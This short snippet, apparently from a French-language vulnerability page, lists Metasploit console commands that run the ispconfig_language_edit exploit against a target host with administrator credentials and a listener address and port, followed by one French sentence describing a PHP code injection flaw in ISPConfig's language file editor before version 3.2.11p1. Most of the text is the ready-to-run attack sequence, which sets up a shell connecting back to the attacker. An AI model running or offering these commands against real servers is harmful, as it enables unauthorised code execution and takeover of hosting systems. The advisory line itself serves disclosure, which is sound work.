
Modules Metasploit
Module Metasploit

use exploit/linux/http/ispconfig_language_edit
set RHOSTS target.com
set USERNAME admin
set PASSWORD password123
set LHOST 127.0.0.1
set LPORT 4444
exploit
Un problème a été découvert dans ISPConfig avant la version 3.2.11p1. Une injection de code PHP peut être réalisée dans l'éditeur de fichiers de langue par un administrateur si admin_allow_langedit est activé.